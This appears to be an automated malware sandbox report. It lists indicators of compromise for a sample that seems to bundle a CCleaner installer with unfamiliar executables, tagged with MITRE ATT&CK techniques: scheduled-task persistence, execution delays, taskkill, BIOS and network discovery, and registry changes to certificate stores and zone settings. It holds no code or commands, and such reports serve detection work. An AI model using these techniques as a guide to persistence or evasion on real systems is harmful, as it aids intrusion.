Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
3484	schtasks.exe
2692	schtasks.exe
3052	schtasks.exe
5716	schtasks.exe
3632	schtasks.exe
2424	schtasks.exe
6304	schtasks.exe
2364	schtasks.exe
6464	schtasks.exe
1556	schtasks.exe
1484	schtasks.exe
4428	schtasks.exe
1772	schtasks.exe
5152	schtasks.exe
2732	schtasks.exe
6600	schtasks.exe

Delays execution with timeout.exe 7 IoCs

evasion

pid	Process
4552	timeout.exe
2116	timeout.exe
1544	timeout.exe
5744	timeout.exe
560	timeout.exe
5712	timeout.exe
3496	timeout.exe

Enumerates system info in registry 2 TTPs 22 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	MnBDI.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	rundll32.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	rundll32.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	MnBDI.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Gathers network information 2 TTPs 1 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
5940	ipconfig.exe

Kills process with taskkill 5 IoCs

evasion

pid	Process
5968	taskkill.exe
5268	taskkill.exe
4176	taskkill.exe
3164	taskkill.exe
5844	taskkill.exe

Modifies Control Panel 64 IoCs

evasion

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur"	Snetchball.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur"	Snetchball.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur"	Snetchball.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur"	Snetchball.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur"	Snetchball.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur"	Snetchball.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur"	Snetchball.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur"	Snetchball.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur"	Snetchball.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur"	Snetchball.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur"	Snetchball.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur"	Snetchball.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur"	Snetchball.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur"	Snetchball.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur"	Snetchball.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur"	Snetchball.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur"	Snetchball.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur"	Snetchball.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur"	Snetchball.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur"	Snetchball.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur"	Snetchball.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur"	Snetchball.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur"	Snetchball.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur"	Snetchball.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur"	Snetchball.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur"	Snetchball.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur"	Snetchball.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur"	Snetchball.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur"	Snetchball.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur"	Snetchball.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur"	Snetchball.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur"	Snetchball.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur"	Snetchball.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur"	Snetchball.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur"	Snetchball.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur"	Snetchball.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur"	Snetchball.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur"	Snetchball.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur"	Snetchball.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur"	Snetchball.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur"	Snetchball.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur"	Snetchball.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur"	Snetchball.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur"	Snetchball.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur"	Snetchball.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur"	Snetchball.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur"	Snetchball.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur"	Snetchball.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur"	Snetchball.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur"	Snetchball.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur"	Snetchball.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur"	Snetchball.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur"	Snetchball.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur"	Snetchball.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur"	Snetchball.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur"	Snetchball.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur"	Snetchball.exe

Modifies Internet Explorer settings 1 TTPs 3 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	CCleaner64.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	CCleaner64.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Software\Microsoft\Internet Explorer\TypedURLs	CCleaner64.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume	KtercHi.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Piriform\CCleaner	ccsetup622.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Piriform	ccsetup622.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	KtercHi.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	KtercHi.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	KtercHi.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133576842887460605"	chrome.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Piriform\CCleaner\AcqSrc = "mmm_ccl_003_999_a8d_m"	ccsetup622.exe
Set value (str)	\REGISTRY\USER\S-1-5-19\Software\Piriform\CCleaner\AutoICS = "1"	ccsetup622.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run	CCleanerPerformanceOptimizerService.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved	CCleanerPerformanceOptimizerService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	KtercHi.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	KtercHi.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows	CCleanerPerformanceOptimizerService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run	CCleanerPerformanceOptimizerService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software	ccsetup622.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	rundll32.exe
Set value (data)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\OneDriveSetup = 020000000000000000000000	CCleanerPerformanceOptimizerService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Piriform\CCleaner\Brandover = "0"	ccsetup622.exe

Modifies registry class 44 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\cclaunch\shell\	ccsetup622.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage	winit.exe
Key created	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000_Classes\Local Settings	R8.exe
Key created	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000_Classes\Local Settings	OpenWith.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\Open CCleaner...\command\ = "C:\\Program Files\\CCleaner\\ccleaner.exe /FRB"	ccsetup622.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\cclaunch\shell\open	ccsetup622.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\cclaunch\ = "URL: CCleaner Protocol"	ccsetup622.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\Run CCleaner\command\ = "C:\\Program Files\\CCleaner\\ccleaner.exe /AUTORB"	ccsetup622.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\Shell\Open CCleaner...\command	ccsetup622.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\cclaunch	ccsetup622.exe
Key created	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000_Classes\Software\Piriform\CCleaner	ccsetup622.exe
Key created	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000_Classes\Software	ccsetup622.exe
Key created	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000_Classes\Software\Piriform	ccsetup622.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000_Classes\Software\Piriform\CCleaner\Brandover = "0"	ccsetup622.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID	ccsetup622.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3263309122-2820180308-3568046652-1000\{C0C96F69-9EFD-468B-9D6E-B4156CDE892D}	msedge.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\C06AEB9D-8774-46E7-8160-8321BCD14D9F\56C7A9DA-4B11-406A-8B1A-EFF157C294D6 = "8b177e78-18e3-4a23-b415-9ad4c0b1ae0e"	CCleaner64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\Open CCleaner...\command	ccsetup622.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\cclaunch\shell	ccsetup622.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\cclaunch\shell\open\	ccsetup622.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\cclaunch\shell\open\command	ccsetup622.exe
Key created	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\Run CCleaner\command	ccsetup622.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000_Classes\Software\Piriform\CCleaner\AcqSrc = "mmm_ccl_003_999_a8d_m"	ccsetup622.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}	ccsetup622.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\C06AEB9D-8774-46E7-8160-8321BCD14D9F	CCleaner64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\C06AEB9D-8774-46E7-8160-8321BCD14D9F\7CCD586D-2ABC-42FF-A23B-3731F4F183D9 = "4DEC930631D6A523D3820D3CE1249367"	CCleaner64.exe
Key created	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000_Classes\Local Settings	wini.exe
Key created	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000_Classes\MIME\Database	winit.exe
Key created	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000_Classes\Local Settings	audioplayerjsplugin.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\cclaunch\URL Protocol	ccsetup622.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\Open CCleaner...	ccsetup622.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\cclaunch\shell\open\command\ = "\"C:\\Program Files\\CCleaner\\ccleaner.exe\" /%1"	ccsetup622.exe
